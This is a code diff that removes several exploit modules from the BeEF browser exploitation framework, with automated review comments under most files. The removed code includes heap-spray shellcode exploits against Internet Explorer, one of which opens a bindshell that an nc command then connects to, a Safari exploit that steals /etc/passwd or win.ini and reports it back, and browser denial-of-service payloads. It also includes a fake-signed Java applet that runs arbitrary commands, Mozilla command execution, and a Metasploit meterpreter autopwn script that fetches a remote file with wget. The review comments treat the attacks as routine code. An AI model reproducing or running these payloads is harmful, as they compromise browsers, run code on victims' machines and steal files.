set_current_zombie: function(zombie_id) {
this.current_zombie = zombie_id;
this.zombie.ip = this.zombie_data[zombie_id]['ip'];
this.zombie.agent_image = this.zombie_data[zombie_id]['agent_image'];
this.zombie.os_image = this.zombie_data[zombie_id]['os_image'];
this.zombie.set_id(zombie_id);
},
get_html_buttons: function() {
update_zombie_div('zombiesdyn', this.current_zombie, 'buttons');
},
clear_current_zombie_results: function() {
update_zombie_div('zombie_results_data', this.current_zombie, 'deleteresults');
}
}
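Review bot: `ZombieList.add` concatenates `zombie_id` into a `javascript:select_zombie('...')` href and places the comma-split metadata fields from `get_zombie_details.php` into `img` `src` attributes without any validation, so a value that originates from a hooked browser and contains a quote can run script inside the operator's console. Validate the id against the expected format and attach the click handler with `Event.observe` and a closure instead of building a `javascript:` URL. In `update`, expired entries are removed from the DOM but stay in `zombie_data` and `selected_zombies`, so `send_code` can still post to them. `send_code` reports "No Zombie Selected" but does not return. The trailing commas after `evalScripts: false` and inside the `Builder.node` arrays are syntax errors in older Internet Explorer versions, and `element`, `zom_id_arr`, `zombie_details_arr` and `tmp_code` are implicit globals.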


@@ -1,62 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<!--
BeEF: the following is the boiler plate from the exploit
..::[ jamikazu presents ]::..
Microsoft Internet Explorer WebViewFolderIcon (setSlice) Exploit (0day)
Works on all Windows XP versions including SP2
Author: jamikazu
Mail: jamikazu@gmail.com
Bug discovered by Computer H D Moore (http://www.metasploit.com)
Credit: metasploit, SkyLined
invokes calc.exe if successful
-->
<script>
function get_b64_code_2006_3730() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('CVE-2006-3730', get_b64_code_2006_3730());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_2006_3730());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">CVE-2006-3730 (MS06-057)</div>
This module will launch calc.exe (Calculater) on Microsoft Windows. A vulnerability in
Microsoft Internet Explorer WebViewFolderIcon (setSlice) is exploited.<br><br>
<div id="module_subsection">
<form name="myform">
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>
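Review bot: the `require_once("../../../include/common.inc.php")` at the top resolves against the current working directory rather than this file's location, so the include fails or picks up a different file when the script is reached through another entry point; anchor it with `dirname(__FILE__)`. `DEFINE` should be written `define` for consistency with the rest of PHP's function naming, the `javascript:` prefix inside the `onClick` attributes is only a label and can be dropped, and the user-facing description misspells "Calculator" as "Calculater".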


@@ -1 +0,0 @@
IE6 setSlice calc.exe (CVE-2006-3730)


@@ -1,38 +0,0 @@
var heapSprayToAddress = 0x05050505;
var payLoadCode = unescape(
"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120" +
"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424" +
"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304" +
"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0" +
"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A" +
"%uFF57%u63E7%u6C61%u0063");
var heapBlockSize = 0x400000;
var payLoadSize = payLoadCode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u0505%u0505");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}
for ( i = 0 ; i < 128 ; i++)
{
try{
var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505 );
}catch(e){}
}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}


@@ -1,80 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<!--
BeEF: http://www.milw0rm.com/exploits/8079
BeEF: the following is the boiler plate from the exploit
Internet Explorer 7 Uninitialized Memory Corruption Exploit
http://www.microsoft.com/technet/security/bulletin/MS09-002.mspx
Abyssec Inc Public Exploits 2009/2/18
this Exploit is based on N/A PoC in Milw0rm but The PoC was really simple to
exploit this PoC can be exploit on DEP-Enabled System As well using .Net
Shellcode trick or etc mayve i write Dep-Enabled version too And also
i should notice , this code can modify to be more reliable ..
Feel free to visit us at : www.Abyssec.com
to contact me directly use : admin@abyssec.com
Note : Tested and Worked On XP SP2 please wait for another version
// Skyland win32 bindshell (28876/tcp) shellcode
// If you want an evill Shellcode go ahead !!!
-->
<script>
function get_b64_code_2009_0075() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
// replace sections of the code with user input
b64code = b64replace(b64code, "REGEXP", document.cmd_form.regexp.value);
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('CVE-2009-0075 (MS09-002)', get_b64_code_2009_0075());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_2009_0075());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">CVE-2009-0075 (MS09-002)</div>
Internet Explorer 7 Uninitialized Memory Corruption Exploit. This module targets
Windows XP SP2. Successful exploitation will start a bindshell listening on port
28879.<br><br>
The following command will connect to the listening bindshell:
<pre>
nc zombieip 28879
</pre>
<div id="module_subsection">
<form name="cmd_form">
<div id="module_subsection_header">UserAgent Regexp</div>
<input type="text" name="regexp" value="/.*Windows.*/"/>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>
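Review bot: the documentation in this file disagrees with itself: the quoted boilerplate comment names port 28876/tcp, while the module description and the `nc zombieip 28879` line say 28879. Reconcile the two so the operator-facing text matches what the bundled template actually does. The `regexp` field is also substituted into the code through `b64replace` with no validation, so a malformed pattern only surfaces as a script error on the receiving side; check that it parses before sending.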


@@ -1 +0,0 @@
XP SP2 IE Bindshell (CVE-2009-0075)


@@ -1,35 +0,0 @@
if(navigator.userAgent.match(REGEXP)) {
var shellcode=unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb");
var array = new Array();
//Don't need change but for execute time you can change ;)
var calc = 0x100000-(shellcode.length*2+0x01020);
// Spray or Not :-??
var point = unescape("%u0D0D%u0D0D");
while(point.length<calc) { point+=point;}
var sec = point.substring(0,calc/2);
delete point;
for(i=0; i<0xD0; i++) {
array[i] = sec + shellcode;
}
// N/A Code
CollectGarbage();
var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<500;x++) a1.push(document.createElement("img"));
o1=document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();
o1.clearAttributes();
o1=null; CollectGarbage();
for(var x=0;x<a1.length;x++) a1[x].src=s1;
o2.click;
}


@@ -1,52 +0,0 @@
<?php
// Copyright (c) 2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<!--
BeEF: the following details refer to the source of this port
Billy (BK) Rios
Blog: Stealing More Files with Safari
http://xs-sniper.com/blog/2009/02/13/stealing-more-files-with-safari/
-->
<script>
function get_b64_code_2009_0137() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('CVE-2009-0137', get_b64_code_2009_0137());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_2009_0137());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">CVE-2009-0137</div>
This Safari exploit module will steal a file from the file system. On Windows
the 'c:\windows\win.ini' will be stolen and on a Mac the '/etc/passwd' will
be stolen.<br><br>
The results will be displayed in the log. <br><br>
<div id="module_subsection">
<form name="myform">
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>


@@ -1 +0,0 @@
Safari File Theft (CVE-2009-0137)


@@ -1,20 +0,0 @@
<?php
// Copyright (c) 2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php");
?>
beef_url = "<?php echo BEEF_DOMAIN; ?>";
// ---[ RETURN_RESULT
// send result to beef
function return_result(action, data) {
var img_tmp = new Image();
var src = beef_url + '/hook/return.php?BeEFSession=<?php echo session_id(); ?>&action=' + action + '&data=' + escape(data);
img_tmp.src = src;
}
return_result(result_id, file_content);
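Review bot: `return_result` puts the PHP session identifier in the query string (`BeEFSession=<?php echo session_id(); ?>`) of an image request, so it ends up in web server logs, proxy logs and browser history, where anyone with read access can replay it. Send it in a cookie or a POST body instead. The payload is also encoded with `escape()`, which mishandles non-ASCII text, and is carried in a GET URL that is subject to length limits, so large results are silently truncated. `beef_url`, `result_id` and `file_content` are implicit globals that this script expects the including page to have set; that dependency should be documented at the top of the file.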


@@ -1,11 +0,0 @@
function do_main(){
var iframe = document.createElement('iframe');
// pass result_id in the url
iframe.src = beef_url + 'modules/symmetric/xplt_cve_2009_0137/xss-max.xml' + '#' + result_id;
iframe.setAttribute("width", "1");
iframe.setAttribute("height", "1");
iframe.setAttribute("style", "visibility:hidden;");
document.body.appendChild(iframe);
}
do_main();
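Review bot: The iframe URL in `do_main()` points at `modules/symmetric/xplt_cve_2009_0137/xss-max.xml`, while xss-max.xml in the same module loads its helper from `modules/browser/xplt_cve_2009_0137/snatchxml.php`, so one of the two directory names is stale. Settle on one and derive both paths from a single constant. The concatenation `beef_url + 'modules/...'` also assumes `beef_url` ends in a slash, whereas snatchxml.php builds `beef_url + '/hook/return.php'`; the trailing-slash convention should be stated once.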


@@ -1,66 +0,0 @@
<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
>
<channel>
<title>Local XSS</title>
<link>http://www.bindshell.net</link>
<description>BeEF Browser Exploitation Framework</description>
<item>
<title>BeEF module</title>
<content:encoded><![CDATA[
<body src="/beef/images/beef.gif" onload="javascript:;
var req;
var req_file;
if (/Windows/.test(navigator.userAgent)) {
req_file='file:///c:/windows/win.ini'
} else {
req_file='file:////etc/passwd'
};
req = new XMLHttpRequest();
req.onreadystatechange = processReqChange;
req.open('GET', req_file, true);
req.send('');
function processReqChange() {
if (req.readyState == 4) {
file_content = req.responseText;
result_id=document.location.hash.substr(1,document.cookie.length);
beef_url = 'http://' + document.location.host + '/beef/';
var html_doc = document.getElementsByTagName('head').item(0);
var js = document.createElement('script');
js.src = beef_url + 'modules/browser/xplt_cve_2009_0137/snatchxml.php';
js.type = 'text/javascript';
html_doc.appendChild(js);
}
}" <onload=""
]]>
</content:encoded>
</item>
<title>Local XSS</title>
<link>http://www.bindshell.net</link>
<description>none</description>
<item>
<title>RSS sploit</title>
<content:encoded><![CDATA[
]]>
</content:encoded>
</item>
</channel>
</rss>
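Review bot: After the first `</item>` the channel repeats `<title>`, `<link>` and `<description>` and then carries a second item, "RSS sploit", whose `<content:encoded>` CDATA is empty. That reads as leftover scaffolding; remove the duplicate channel metadata and the empty item, or add a comment saying why the feed needs them. The hard-coded `'/beef/'` in the `beef_url` assignment also duplicates what snatchxml.php takes from `BEEF_DOMAIN`, leaving two places to keep in sync.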


@@ -1,71 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<!--
BeEF: http://www.milw0rm.com/exploits/8573
BeEF: http://www.secniche.org/gthr.html
BeEF: the following is the boiler plate from the exploit
Advisory: Google Chrome 1.0.154.59 "throw exception" Memory Exhaustion Vulnerability.
Version Affected:
1.0.154.59 . Previous versions are vulnerable too
Description:
The Google chrome browser is vulnerable to memory exhaustion based denial of service which can be triggered remotely.The vulnerability is a result of arbitrary shell code which is rendered in a script tag with an exception that is raised directly with throw statement. It makes the browser to consume memory thereby impacting the focussed window and leads to crash. The impact can be stringent based on different systems.
Proof of Concept:
http://www.secniche.org/gthr
Detection:
SecNiche confirmed this vulnerability affects Google Chrome on Microsoft Windows XP SP2 platform.The versions tested are:1.0.154.59
Disclosure Timeline:
Release Date. April 28 ,2009
Credit:
Aditya K Sood
-->
<script>
function get_b64_code_cd() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Dos Chrome', get_b64_code_cd());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_cd());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">DoS Chrome "throw exception" Memory Exhaustion</div>
Google Chrome 1.0.154.53 "throw exception" Remote Crash and Denial of Service <br>
Executing NOP Sled and Shellcode to create an Exception.<br><br>
<div id="module_subsection">
<form name="myform">
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>
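Review bot: The page text says "Google Chrome 1.0.154.53" while the advisory quoted in the comment block above names 1.0.154.59 as the affected and tested version; one of the two is a typo and the page should match the advisory. The autorun label passed to `ar.enable` is 'Dos Chrome' where the header uses "DoS Chrome", and the line "Executing NOP Sled and Shellcode to create an Exception" reads as if code is executed, while the advisory describes memory exhaustion from a thrown string.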


@@ -1 +0,0 @@
DoS Chrome


@@ -1,6 +0,0 @@
var nop_sled=unescape("%u9090");
var shellcode_sled=unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065");
for(var i=0;i<64;i++){
nop_sled=nop_sled+nop_sled;
document.write('<script>throw nop_sled+shellcode_sled;</scr'+'ipt>');
}
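Review bot: `shellcode_sled` is an opaque blob with no comment on its origin or contents, and the advisory quoted in this module's index page attributes the effect to memory exhaustion from the thrown string rather than to anything the bytes do. Add a comment stating where the value came from and what it encodes, or replace it with inert filler of the same length so the repository does not carry unexplained machine code. This template also never calls `return_result`, unlike the other templates in this commit, so the module reports no status.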


@@ -1,7 +0,0 @@
<html>
<body onLoad="document.forms[0].submit()">
<FORM>
<KEYGEN NAME="somekey" CHALLENGE="1125983021">
<INPUT TYPE="submit" NAME="SubmitButton" VALUE="Done">
</FORM>
</html>


@@ -1,46 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<!--
BeEF: this exploit was downloaded from milworm
http://www.milw0rm.com/exploits/8822
-->
<script>
function get_b64_code_fd() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('DoS Firefox', get_b64_code_fd());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_fd());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">DoS Firefox (Keygen)</div>
This will DoS firefox and give very limited interaction. A dialog will be displayed repeatedly.<br><br>
<div id="module_subsection">
<form name="myform">
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>


@@ -1 +0,0 @@
DoS Firefox (Keygen)


@@ -1,12 +0,0 @@
function do_main(){
var iframe = document.createElement('iframe');
iframe.src = beef_url + 'modules/symmetric/xplt_firefox_dos/ffkeygendos.html';
iframe.setAttribute("width", "1");
iframe.setAttribute("height", "1");
iframe.setAttribute("style", "visibility:hidden;");
document.body.appendChild(iframe);
return "Request Sent";
}
return_result(result_id, do_main());

File diff suppressed because one or more lines are too long


@@ -1,43 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once ("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
var rtnval = "This shouldn't be returned'";
function get_b64_code_request() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('DoS Generic', get_b64_code_request());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_request());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">DoS Generic</div>
This will DoS many browsers. A large string will be repeatedly
written using the JavaScript function document.writeln(). <br><br>
<div id="module_subsection">
<form name="myform">
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>
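Review bot: `get_b64_code_request` is also the name used by the Metasploit Browser Autopwn (Manual Setup) page later in this commit, while the other module pages use unique suffixes (`_cd`, `_fd`, `_applet`); if module pages are ever loaded into the same document, the later definition silently replaces the earlier one. Rename it to something module-specific. `var rtnval = "This shouldn't be returned'";` is never read in this file and has a stray apostrophe before the closing quote, so it can be dropped.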


@@ -1 +0,0 @@
DoS Generic


@@ -1,15 +0,0 @@
// thanks pipes (mark@freedomisnothingtofear.com)
function do_main(){
var iframe = document.createElement('iframe');
iframe.src = beef_url + 'modules/browser/generic_dos/browserdos.html';
iframe.setAttribute("width", "1");
iframe.setAttribute("height", "1");
iframe.setAttribute("style", "visibility:hidden;");
document.body.appendChild(iframe);
return "Executing now";
}
return_result(result_id, do_main());


@@ -1,52 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// Module by: Joshua "Jabra" Abraham http://blog.spl0it.org
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
function get_b64_code_applet() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
// do some super escaping
cmd_str = document.myform.cmd.value;
cmd_str = cmd_str.replace(/\\/g, '\\\\');
cmd_str = cmd_str.replace(/\\/g, '\\\\');
// replace sections of the code with user input
b64code = b64replace(b64code, "BEEFCMD_IE",cmd_str);
b64code = b64replace(b64code, "BEEFCMD",cmd_str);
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Malicious Applet', get_b64_code_applet());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_applet());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Malicious Java Applet</div>
This module will execute a command on the client. The client will receive a Java Applet popup. <br><br>
The certificate is self-signed by the Microsoft Corporation.<br><br>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header">Command</div>
<input type="text" name="cmd" value="c:\windows\system32\calc.exe"/>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>
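Review bot: In `get_b64_code_applet()` the line `cmd_str = cmd_str.replace(/\\/g, '\\\\');` appears twice in a row, so every backslash in the input becomes four, and the only explanation is "do some super escaping". If both passes are intended, the comment should say which two decoding layers they compensate for; if not, one is a copy-paste duplicate. `cmd_str` is also assigned without `var` and leaks into the global scope. The sentence "The certificate is self-signed by the Microsoft Corporation" should say that the certificate is self-signed and only carries that name.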


@@ -1 +0,0 @@
Malicious Java Applet


@@ -1,30 +0,0 @@
// ie doesn't play nice with dynamic loading of jars - below is a link to what sun recommends
// if any knows a nicer way to do this drop me an email
// http://java.sun.com/javase/6/docs/technotes/guides/plugin/developer_guide/using_tags.html#javascript
function applet() {
var _app = navigator.appName;
if (_app == 'Microsoft Internet Explorer') {
var malicious = document.createElement("div");
malicious.innerHTML = '<OBJECT classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="0" height="0"> <PARAM name="codebase" value="../modules/standard/malicious_applet"> <PARAM name="code" value="Update">> <PARAM name="archive" value="SignedUpdate.jar">> <PARAM name="cmd" value="BEEFCMD_IE"> </OBJECT>';
document.body.appendChild(malicious);
} else {
document.write(
'<embed ',
'code="Update"',
'codebase="../modules/browser/malicious_applet/"',
'archive="SignedUpdate.jar"',
'cmd="BEEFCMD"',
'width="0"',
'height="0"',
'type="application/x-java-applet;version=1.6" />');
}
return_result(result_id, "Appet running");
}
applet();
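Review bot: `return_result(result_id, "Appet running")` has a typo in the status string and is sent unconditionally, so the log records the applet as running whether or not it loaded. In the IE branch the markup has stray `>` characters after the `code` and `archive` PARAM tags, and its codebase is `../modules/standard/malicious_applet` while the other branch uses `../modules/browser/malicious_applet/`; the two should agree.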


@@ -1,53 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
get_b64_code_alert = function () {
// javascript is loaded from a file - it could be hard coded
var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
// replace sections of the code with user input
b64code = b64replace(b64code, "BEEFCOMMAND", document.myform.command_str.value);
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Mozilla nsIProcess Interface', get_b64_code_alert());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_alert());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Mozilla nsIProcess XPCOM Interface (Windows)</div>
The nsIProcess XPCOM interface represents an executable process. JavaScript
code with chrome privileges can use the nsIProcess interface to launch
executable files. In this module, nsIProcess is combined with the Windows
command prompt cmd.exe.
<br><br>
Any XSS injection in a chrome privileged zone (e.g. typically in Firefox
extensions) allows his module to execute arbitrary commands on the victim
machine.
<br><br>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header">Windows Command</div>
<input type="text" width="90%" name="command_str" value="ping localhost"/>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>
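Review bot: The description reads "allows his module", which should be "this module", and the helper is named `get_b64_code_alert`, which looks copied from an alert module and does not describe this page. The header says "(Windows)" but the `ar.enable` label 'Mozilla nsIProcess Interface' omits it; the label should carry the platform as well so the autorun list matches the page.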


@@ -1 +0,0 @@
Mozilla nsIProcess Interface


@@ -1,17 +0,0 @@
// thanks Roberto (roberto.suggi@security-assessment.com) and Nick (nick.freeman@security-assessment.com)
function do_main(){
var getWorkingDir= Components.classes["@mozilla.org/file/directory_service;1"].getService(Components.interfaces.nsIProperties).get("Home",Components.interfaces.nsIFile);
var lFile = Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile);
var lPath = "C:\\WINDOWS\\system32\\cmd.exe";
lFile.initWithPath(lPath);
var process = Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);
process.init(lFile);
process.run(false,['/c', 'BEEFCOMMAND'],2);
}
do_main();
return_result(result_id, "command executed");
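Review bot: `getWorkingDir` in `do_main()` is assigned and never used, so it should be dropped. The status string "command executed" is sent without looking at anything `process.run` reports, which means the log states an outcome the code has not checked; word it as "command submitted" or report the actual outcome.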


@@ -1,61 +0,0 @@
<?php
// Copyright (c) 2009, Ryan Linn (sussurro@happypacket.net)
// All Rights Reserved
// Template for code by:
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<!--
BeEF: the following is the boiler plate from the exploit
-->
<script language="javascript" type="text/javascript">
var rtnval = "OK Clicked";
Element.Methods.construct_code = function($url) {
// javascript is loaded from a file - it could be hard coded
var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
b64code = b64replace(b64code, "URL",$url);
// send the code to the zombies
do_send(b64code);
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Metasploit Browser Autopwn</div>
This module creates a Metasploit listener using a backend server, and then sends the client
code which creates an iframe connecting to the waiting exploit.<br><br>
Setup MSF to allow BeEF access (settings in /beef/ui/msf.php):<br>
<pre>
sudo ./msfconsole
msf > load xmlrpc Pass=BeEFMSFPass
</pre>
<div id="module_subsection">
<form name="myform" id="myform">
<div id="module_subsection_header">LHOST (Required)</div>
<input type="text" name="LHOST" value="0.0.0.0"/>
<div id="module_subsection_header">LPORT</div>
<input type="text" name="LPORT" value="4444"/>
<div id="module_subsection_header">SRVHOST (Required)</div>
<input type="text" name="SRVHOST" value="0.0.0.0"/>
<div id="module_subsection_header">SRVPORT (Required)</div>
<input type="text" name="SRVPORT" value="8080"/>
<div id="module_subsection_header">URIPATH</div>
<input type="text" name="URIPATH" value="beef"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:msf_browser_autopwn()"/>
</form>
</div>
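Review bot: The setup text documents a fixed password, `load xmlrpc Pass=BeEFMSFPass`, and the LHOST and SRVHOST defaults are 0.0.0.0. Anyone who has read this page knows the credential for an operator's XML-RPC listener, so the instructions should tell the operator to choose their own password, set the same value in /beef/ui/msf.php, and bind the service to a loopback or lab-only address. Minor: `construct_code` takes a PHP-style `$url` parameter, and `msf_browser_autopwn()` in the onClick is not defined in this file, so a comment should say where it lives.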


@@ -1 +0,0 @@
MSF Browser Autopwn


@@ -1,14 +0,0 @@
// iframe.setAttribute("style", "visibility:hidden;"); doesn't work with ie
function do_main(){
var iframe = document.createElement('iframe');
iframe.src = 'URL';
iframe.setAttribute("width", "1");
iframe.setAttribute("height", "1");
iframe.setAttribute("style", "visibility:hidden;");
document.body.appendChild(iframe);
return "Launched Browser AutoPWN";
}
return_result(result_id, do_main());
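Review bot: The header comment says the `visibility:hidden` style call does not work with IE, yet `do_main()` still makes that exact call, so the comment and the code contradict each other; either drop the comment or say why the call is kept. The same function body, differing only in the URL and the returned string, is repeated in the other Metasploit templates in this commit and belongs in one shared helper.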


@@ -1,9 +0,0 @@
use auxiliary/server/browser_autopwn
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.1
set LPORT 53
set SRVPORT 9000
set URIPATH /beef.html
sh -c 'cd /tmp; wget http://spl0it.org/files/msfautopwn.rb'
set AutoRunScript /tmp/msfautopwn.rb
run
